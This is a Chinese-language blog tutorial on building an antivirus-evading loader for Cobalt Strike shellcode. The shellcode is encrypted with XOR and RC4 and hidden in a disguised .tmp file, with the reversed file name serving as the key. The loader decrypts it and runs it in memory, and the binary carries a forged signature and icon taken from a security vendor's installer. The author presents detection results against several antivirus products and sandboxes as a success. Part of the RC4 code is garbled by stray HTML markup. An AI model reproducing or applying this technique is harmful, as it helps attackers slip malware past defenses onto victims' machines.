分离免杀-伪装临时文件
加密器
首先cs生成stagerless的payload,这里图没截好,注意生成raw格式的:
生成的shellcode很大,所以最好就是单独放到文件中方便读取,然后写一个加密器,读取并生成加密后的shellcode。先生成一个长度为16到25长的密钥。
func g() string {
rand.Seed(time.Now().UnixNano())
chars := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
length := rand.Intn(10) + 16
var key = strings.Builder{}
for i := 0; i < length; i++ {
key.WriteByte(chars[rand.Intn(len(chars))])
}
return key.String()
}
这个长度是因为,近几天看了海莲花组织最新攻击样本的分析,他截取的路径后15位就是白程序名并作为解密的key,一定程度上能够 反沙箱和分析调试,我这就想将生成的密钥反转并作为存shellcode的文件名,以tmp结尾伪装临时文件不容易生疑。
func reverseString(str string) string {
runes := []rune(str)
for i, j := 0, len(runes)-1; i < j; i, j = i+1, j-1 {
runes[i], runes[j] = runes[j], runes[i]
}
return string(runes)
}
之后就是打开文件读取并加密,先异或再经过rc4再转成16进制,就可以写入tmp文件,至此加密器完成。
加载器
loader的逻辑也很简单,读取当前目录下所有文件找到一个文件名长度大于15且以tmp结尾的就获取文件名反转作为key,后面的就是相反操作。没有符合的文件就不生效也就不需要添加反沙箱的代码了。不过有一点在c中只需要使用openssl中的一个RC4算法没必要调用整个库。所以要分离出来。
分离算法
从openssl官网下载压缩包解压,要将解压的目录中的/crypto/rc4 和 /include/openssl/rc4.h复制到自己的工程目录下新建的文件夹RC4。可以删除无用文件:asm、build.info、rc4_local.h。最后这个目录如下:
目录: E:\coding\c\tmpFileLoader\rc4
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2023/11/30 23:42 440 rc4.h
-a---- 2023/11/30 23:40 1888 rc4_enc.c
-a---- 2023/11/30 23:41 1003 rc4_skey.c
然后在loader的主函数中就可以直接#include "rc4/rc4.h"来包含头文件,但这时还有报错。
修改rc4.h:
-
删除条件编译 OPENSSL_RC4_H
-
删除条件编译 OPENSSL_NO_DEPRECATED_3_0
-
删除条件编译 OPENSSL_NO_DEPRECATED_3_0
-
删除条件编译 OPENSSL_NO_RC4
-
删除头文件# include <openssl/macros.h>
-
删除头文件# include <openssl/opensslconf.h>
-
删除函数类型宏OSSL_DEPRECATEDIN_3_0
-
定义RC4_INT类型
最终如下:
# pragma once
# include <stddef.h>
# ifdef __cplusplus
extern "C" {
# endif
typedef int RC4_INT;
typedef struct rc4_key_st {
RC4_INT x, y;
RC4_INT data[256];
} RC4_KEY;
const char *RC4_options(void);
void RC4_set_key(RC4_KEY *key, int len,
const unsigned char *data);
void RC4(RC4_KEY *key, size_t len,
const unsigned char *indata,
unsigned char *outdata);
# ifdef __cplusplus
}
# endif
修改rc4_skey.c
-
删除头文件# include "internal/deprecated.h"
-
修改头文件# include <openssl/rc4.h>改为#include "rc4.h"
-
删除头文件# include "rc4_local.h"
-
删除头文件#include <openssl/opensslv.h>
最终如下:
#include "rc4.h"
const char *RC4_options(void)
{
if (sizeof(RC4_INT) == 1)
return "rc4(char)";
else
return "rc4(int)";
}
/*-
* RC4 as implemented from a posting from
* Newsgroups: sci.crypt
* Subject: RC4 Algorithm revealed.
* Message-ID: <sternCvKL4B.Hyy@netcom.com>
* Date: Wed, 14 Sep 1994 06:35:31 GMT
*/
void RC4_set_key(RC4_KEY *key, int len, const unsigned char *data)
{
register RC4_INT tmp;
register int id1, id2;
register RC4_INT *d;
unsigned int i;
d = &(key->data[0]);
key->x = 0;
key->y = 0;
id1 = id2 = 0;
#define SK_LOOP(d,n) { \
tmp=d[(n)]; \
id2 = (data[id1] + tmp + id2) & 0xff; \
if (++id1 == len) id1=0; \
d[(n)]=d[id2]; \
d[id2]=tmp; }
for (i = 0; i < 256; i++)
d[i] = i;
for (i = 0; i < 256; i += 4) {
SK_LOOP(d, i + 0);
SK_LOOP(d, i + 1);
SK_LOOP(d, i + 2);
SK_LOOP(d, i + 3);
}
}
修改rc4_enc.c
-
删除头文件# include "internal/deprecated.h"
-
删除头文件# include "rc4_local.h"
-
修改头文件# include <openssl/rc4.h>改为#include "rc4.h"
修改后:
#include "rc4.h"
/*-
* RC4 as implemented from a posting from
* Newsgroups: sci.crypt
* Subject: RC4 Algorithm revealed.
* Message-ID: <sternCvKL4B.Hyy@netcom.com>
* Date: Wed, 14 Sep 1994 06:35:31 GMT
*/
void RC4(RC4_KEY *key, size_t len, const unsigned char *indata,
unsigned char *outdata)
{
register RC4_INT *d;
register RC4_INT x, y, tx, ty;
size_t i;
x = key->x;
y = key->y;
d = key->data;
#define LOOP(in,out) \
x=((x+1)&0xff); \
tx=d[x]; \
y=(tx+y)&0xff; \
d[x]=ty=d[y]; \
d[y]=tx; \
(out) = d[(tx+ty)&0xff]^ (in);
i = len >> 3;
if (i) {
for (;;) {
LOOP(indata[0], outdata[0]);
LOOP(indata[1], outdata[1]);
LOOP(indata[2], outdata[2]);
LOOP(indata[3], outdata[3]);
LOOP(indata[4], outdata[4]);
LOOP(indata[5], outdata[5]);
LOOP(indata[6], outdata[6]);
LOOP(indata[7], outdata[7]);
indata += 8;
outdata += 8;
if (--i == 0)
break;
}
}
i = len & 0x07;
if (i) {
for (;;) {
LOOP(indata[0], outdata[0]);
if (--i <span style="font-weight: bold;" class="mark"> 0)
break;
LOOP(indata[1], outdata[1]);
if (--i </span> 0)
break;
LOOP(indata[2], outdata[2]);
if (--i <span style="font-weight: bold;" class="mark"> 0)
break;
LOOP(indata[3], outdata[3]);
if (--i </span> 0)
break;
LOOP(indata[4], outdata[4]);
if (--i <span style="font-weight: bold;" class="mark"> 0)
break;
LOOP(indata[5], outdata[5]);
if (--i </span> 0)
break;
LOOP(indata[6], outdata[6]);
if (--i == 0)
break;
}
}
key->x = x;
key->y = y;
}
解密后放入内存执行即可。
签名+图标
用这个师傅的工具(记得给师傅一个star)伪造签名和图标,我这直接拿*绒的安装包了。
效果
联想电脑管家:
火绒环境:
defender环境:
360核晶环境:
微步云沙箱检测:
vt结果:
项目地址: gayhub——全球最大的同性交友网站(欢迎star),也请师傅们多多指教。
